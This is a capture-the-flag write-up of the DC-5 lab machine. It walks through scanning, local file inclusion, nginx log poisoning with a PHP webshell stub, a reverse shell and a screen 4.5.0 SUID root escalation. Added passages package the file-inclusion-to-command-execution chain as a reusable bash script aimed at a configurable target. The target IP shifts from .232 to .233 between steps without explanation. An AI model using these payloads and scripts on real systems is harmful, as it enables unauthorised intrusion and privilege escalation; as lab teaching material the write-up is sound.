Another day, another box. Today I am working on DC-5, and it was a great one: I learned some awesome attacks and something as simple as "When All You Can Do Is Read" (pretty informative, give it a Google search). To sum it up: what do we do when all we can do on a box is read? When we cannot list directories but we can pull the famous /etc/passwd? On a CTF you request that file because it is always there, but on a real assessment where you cannot list, you start requesting files you know are supposed to be there.

This box was awesome and of course involved a lot of enumeration. It starts with a normal-looking web page full of gibberish. The most subtle hint we receive is that the year in the Copyright string changes every time we refresh the page, so we can tell something is going on with thankyou.php. After some tweaking we can tell it is vulnerable to LFI. From there we inject PHP into the nginx access log (log poisoning) and get code execution through the same include. Then we continue with privilege escalation: one of the SUID binaries is screen 4.5.0, and with a little coding and compilation we can use it to escalate to root.
[dmcxblue@blackarch ~]$ sudo arp-scan -l
Interface: enp0s3, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1     a4:08:f5:53:18:56   (Unknown)
192.168.1.9     84:4b:f5:63:d7:74   Hon Hai Precision Ind. Co.,Ltd.
192.168.1.175   00:c0:ca:96:e7:91   ALFA, INC.
192.168.1.119   30:d9:d9:54:6f:e2   (Unknown)
192.168.1.232   08:00:27:f2:aa:e5   Cadmus Computer Systems
192.168.1.169   88:de:a9:3c:5b:0d   Roku, Inc.
192.168.1.245   9c:ae:d3:ed:d2:7e   Seiko Epson Corporation

14 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 1.982 seconds (129.16 hosts/sec). 7 responded
The 08:00:27 (Cadmus Computer Systems) MAC prefix is the VirtualBox OUI, so 192.168.1.232 is our target. From here we continue with an nmap scan.
[dmcxblue@blackarch ~]$ nmap -sT -p- --min-rate 5000 192.168.1.232
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-04 10:12 PDT
Nmap scan report for dc-5 (192.168.1.232)
Host is up (0.00027s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
34932/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 13.60 seconds
Nmap targeted port scan
[dmcxblue@blackarch DC-5]$ nmap -sC -sV -p80,111,34932 192.168.1.232 -oA nmap/DC5
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-04 10:14 PDT
Nmap scan report for dc-5 (192.168.1.232)
Host is up (0.00036s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4      111/tcp   rpcbind
|   100000  2,3,4      111/udp   rpcbind
|   100000  3,4        111/tcp6  rpcbind
|   100000  3,4        111/udp6  rpcbind
|   100024  1        34932/tcp   status
|   100024  1        35803/tcp6  status
|   100024  1        42276/udp   status
|_  100024  1        46377/udp6  status
34932/tcp open  status  1 (RPC #100024)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.63 seconds
[dmcxblue@blackarch DC-5]$ gobuster -u http://192.168.1.232 -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php -o DC5-gobuster.log

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.232/
[+] Threads      : 50
[+] Wordlist     : /usr/share/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php
[+] Timeout      : 10s
=====================================================
2019/09/04 10:19:36 Starting gobuster
=====================================================
/index.php (Status: 200)
/images (Status: 301)
/contact.php (Status: 200)
/faq.php (Status: 200)
/solutions.php (Status: 200)
/footer.php (Status: 200)
/css (Status: 301)
/about-us.php (Status: 200)
/thankyou.php (Status: 200)
=====================================================
2019/09/04 10:20:26 Finished
=====================================================
I launched Burp Suite for more detailed enumeration and testing, since the web page itself had nothing of interest: just two interactive PHP pages, contact.php and thankyou.php.
I poked around by intercepting the request with Burp and adding special characters into the URL, or into any area I thought might make the web server crash or respond differently, with no success.
Here I was using Repeater to see if anything would crash or give a different response, until I noticed that the Copyright footer changed years every time I refreshed it. A footer that differs between refreshes is being generated server-side, and gobuster had already found a separate footer.php, so thankyou.php is most likely assembling its page by including other files. That is what pointed me at it.
After tinkering with the URL a couple of times I tried ?file=../../etc/passwd to test for LFI, and Burp Suite showed a positive result: the server responded with the contents of the file.
Researching this vulnerability further, there is an article showing step by step how to move from LFI to a shell. Following those steps, I will continue to get a shell.
Requesting /var/log/nginx/access.log through the same parameter shows that we can read the nginx access log. Nginx writes the raw request line and User-Agent of every request into that file, so we can get our own PHP code into it and then include it back through thankyou.php to get code execution.
We can use curl to inject the code in this step. The PHP goes into the query string, and nginx records the request line in access.log:

[dmcxblue@blackarch ~]$ curl -i 'http://192.168.1.233/thankyou.php?file=<?php passthru($_GET['cmd']); ?>'
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Wed, 04 Sep 2019 19:14:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

One quoting detail: the single quotes around cmd close and reopen the shell's own single-quoted string, so what actually reaches the server is passthru($_GET[cmd]). PHP 5 and 7 treat the bare word cmd as the string 'cmd' (with a notice), so the stub still works; PHP 8 would throw on the undefined constant.
We can verify with a second request that we have code execution: include the log through the same parameter and pass a command in cmd. The output of id comes back inline among the log lines that thankyou.php echoes.

curl -i 'http://192.168.1.233/thankyou.php?file=/var/log/nginx/access.log&cmd=id'
Now to receive a shell. With ncat listening, the same cmd parameter launches a reverse shell back to the listener; once it connects we confirm the user and upgrade to a proper pty with python:

[dmcxblue@blackarch DC-5]$ ncat -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.233.
Ncat: Connection from 192.168.1.233:35736.
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash -i
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
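The LFI to log-poisoning chain above, packaged into one bash script. This is an added example and not the post's own commands. It assumes the same ?file= parameter on thankyou.php, the log at /var/log/nginx/access.log and a TARGET base URL you set, and it deliberately differs from the post in two ways. It plants the PHP stub through the User-Agent header rather than the request line, because curl builds of different ages disagree on whether to percent-encode the space after <?php, and a %20 there means PHP never recognises an open tag. It also uses only single quotes inside the stub, because nginx writes a double quote into its log as \x22, which would turn $_GET["cmd"] into a syntax error. Command output is wrapped in markers so it can be cut out of the surrounding log lines.

```shell
#!/usr/bin/env bash
# LFI -> nginx access.log poisoning -> command execution, as one script.
# Added example; not the post's own commands. Assumptions: the include parameter
# is ?file= on thankyou.php, the log lives at /var/log/nginx/access.log, and
# TARGET is the base URL of the box.
set -u
TARGET="${TARGET:-http://192.168.1.233}"
LOG="${LOG:-/var/log/nginx/access.log}"
MARK_START="__OUT_START__"
MARK_END="__OUT_END__"

# PHP stub that ends up in the log. Single quotes only: nginx writes a double
# quote into the log as \x22, which would turn $_GET["cmd"] into a syntax error.
# Markers bracket the command output so it can be separated from the log noise.
php_stub() {
    printf "<?php echo '%s'; passthru(\$_GET['cmd']); echo '%s'; ?>" "$MARK_START" "$MARK_END"
}

# Read a response body on stdin and print only what sits between the markers,
# handling output that spans several lines or is empty (both markers on one line).
extract_output() {
    awk -v s="$MARK_START" -v e="$MARK_END" '
        {
            line = $0
            if (!inside) {
                i = index(line, s)
                if (i == 0) next
                inside = 1
                line = substr(line, i + length(s))
            }
            j = index(line, e)
            if (j > 0) {
                inside = 0
                line = substr(line, 1, j - 1)
                if (line != "") print line
            } else {
                print line
            }
        }'
}

# 1. Confirm the include reads arbitrary files: root's passwd entry must come back.
lfi_check() {
    curl -s -G --data-urlencode "file=/etc/passwd" "$TARGET/thankyou.php" | grep -q '^root:x:0:0:'
}

# 2. One request whose User-Agent carries the stub. Headers are sent verbatim, so
#    there is no percent-encoding to break the "<?php " open tag.
poison_log() {
    curl -s -o /dev/null -A "$(php_stub)" "$TARGET/"
}

# 3. Include the log; PHP runs the stub with cmd taken from the (properly encoded) query string.
run_cmd() {
    curl -s -G --data-urlencode "file=$LOG" --data-urlencode "cmd=$1" "$TARGET/thankyou.php" | extract_output
}

if [ "${1:-}" = "run" ]; then
    lfi_check || { echo "[-] no LFI on $TARGET/thankyou.php?file="; exit 1; }
    poison_log
    run_cmd "${2:-id}"
fi
```

Usage is `TARGET=http://192.168.1.233 ./lfi2rce.sh run 'id'`. Every later include re-executes the poisoned line, so one poison_log call is enough for as many run_cmd calls as you need; the reverse shell from the post is just another argument to run_cmd.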
Here we use the LinEnum.sh script, as it saves a huge amount of time in enumeration. This does not mean we should skip manual checks, but it at least verifies the common exploits and misconfigurations, mainly for CTFs.
In the SUID list one entry stands out, as it is not common on a Linux machine to see a binary installed with its version number in the file name:
[-] SUID files:
-rwsr-xr-x 1 root root 40168 May 18 2017 /bin/su
-rwsr-xr-x 1 root root 40000 Mar 30 2015 /bin/mount
-rwsr-xr-x 1 root root 27416 Mar 30 2015 /bin/umount
-rwsr-xr-x 1 root root 1441352 Apr 19 23:48 /bin/screen-4.5.0
-rwsr-xr-x 1 root root 75376 May 18 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 89248 Nov 19 2017 /usr/bin/procmail
-rwsr-sr-x 1 daemon daemon 55424 Sep 30 2014 /usr/bin/at
-rwsr-xr-x 1 root root 54192 May 18 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 53616 May 18 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 39912 May 18 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44464 May 18 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 464904 Mar 25 23:07 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 294512 Nov 22 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
Exploit-DB confirms a local privilege escalation for this SUID binary (GNU Screen 4.5.0, CVE-2017-5618, EDB-ID 41154): when run with -L, screen 4.5.0 opens its logfile while still holding root privileges, so an unprivileged user can create or append to any file, including /etc/ld.so.preload. There are plenty of resources on how to exploit it; I used this blog post to compile and run the exploit, since it sometimes does not run as-is and you need to compile it manually to make it work.
Once done, we can confirm our root shell. These are the files we need to compile on our attacking box (libhax.c, the library that ld.so.preload will load, and rootshell.c, the binary it turns setuid root). Compile them for the target's architecture, since the box has no compiler of its own:

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
gcc -o /tmp/rootshell /tmp/rootshell.c
Run by following these steps. We start a Python HTTP server and transfer the compiled files to the victim box; this has to be done after compiling on our own local machine. We also move script.sh over as-is, so that the moment it runs it performs all the steps needed to get a root shell. Make sure `screen` in the script resolves to the setuid 4.5.0 binary listed earlier (on this box /bin/screen-4.5.0); otherwise use its full path.
[dmcxblue@blackarch tmp]$ cat script.sh
#!/bin/bash
# Trimmed down from the screen 4.5.0 exploit: create /etc/ld.so.preload through
# screen's root-owned logfile, then run any setuid screen command so that the
# library is loaded as root and makes /tmp/rootshell setuid root.
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
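Before running script.sh it is worth confirming that the binary really is the setuid 4.5.0 build and that /etc/ld.so.preload does not already exist: the exploit creates that file, and anything listed in it is preloaded into every dynamically linked program on the box from then on, so it must neither be clobbered nor left behind. The pre-flight and clean-up checks below are an added example, not part of the post or of the Exploit-DB code. The `screen -v` banner format "Screen version 4.05.00 (GNU) 10-Dec-16" is an assumption, and the default path /bin/screen-4.5.0 is taken from the SUID listing above.

```shell
#!/usr/bin/env bash
# Pre-flight and clean-up checks around the screen 4.5.0 SUID escalation.
# Added example, not part of the post or of the Exploit-DB code. Assumes the
# `screen -v` banner looks like "Screen version 4.05.00 (GNU) 10-Dec-16" and
# defaults to the /bin/screen-4.5.0 path from the SUID listing.
set -u

# 0 when the banner reports 4.05.00, the release the exploit is written for.
screen_version_vulnerable() {
    local ver
    ver=$(printf '%s' "$1" | sed -n 's/^Screen version \([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\).*/\1/p')
    [ "$ver" = "4.05.00" ]
}

# 0 when an `ls -l` line shows a root-owned file with the setuid bit set
# (an "s" in the owner execute position), which is what lets screen open its
# logfile as root.
ls_line_is_suid_root() {
    local mode owner
    mode=$(printf '%s' "$1" | awk '{print $1}')
    owner=$(printf '%s' "$1" | awk '{print $3}')
    case "$mode" in
        -rws*) [ "$owner" = "root" ] ;;
        *)     return 1 ;;
    esac
}

# Live checks on the box. Refuses to go on if /etc/ld.so.preload already exists:
# the exploit creates that file, and anything listed in it is loaded into every
# dynamically linked program from then on, so it must not be clobbered or left behind.
preflight() {
    local bin="${1:-/bin/screen-4.5.0}"
    [ -x "$bin" ] || { echo "[-] $bin not found or not executable"; return 1; }
    ls_line_is_suid_root "$(ls -l "$bin")" || { echo "[-] $bin is not setuid root"; return 1; }
    screen_version_vulnerable "$("$bin" -v 2>&1 | head -n 1)" || { echo "[-] $bin is not 4.5.0"; return 1; }
    if [ -e /etc/ld.so.preload ]; then
        echo "[!] /etc/ld.so.preload already exists, stopping"
        return 1
    fi
    echo "[+] $bin looks exploitable, run script.sh"
}

# After the root shell: the preload file must be gone, or be removed by hand as root.
postcheck() {
    if [ -e /etc/ld.so.preload ]; then
        echo "[!] /etc/ld.so.preload still present: rm -f /etc/ld.so.preload"
        return 1
    fi
    echo "[+] /etc/ld.so.preload cleaned up"
}

case "${1:-}" in
    pre)  preflight "${2:-/bin/screen-4.5.0}" ;;
    post) postcheck ;;
esac
```

Run `./check.sh pre` as www-data before script.sh and `./check.sh post` from the root shell afterwards. The version and mode parsers take plain strings, so they can be tried against the SUID listing from LinEnum without touching the box.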
Then we execute it, and we get the flag.
This box was awesome, a really interesting way to approach it and get a shell. Also, BlackArch Linux is an incredible OS, all great, so many tools! More than 2000. I was just browsing and wanted to try a few other pen-testing boxes to see what is going on out there. Remember, people, there are so many ways to hack!

[Not sponsored or anything of the sort; the OS is all open source and the authors do this in their spare time, so go check them out. The OS may be a heavy 26 GB but it is still awesome. A few tools are outdated, such as gobuster as I noticed, and it is a little buggy with SQLMap, but that is something that can be fixed and not a major reason to stop using this incredible OS. Oh, and I still went with GNOME on it, lol.]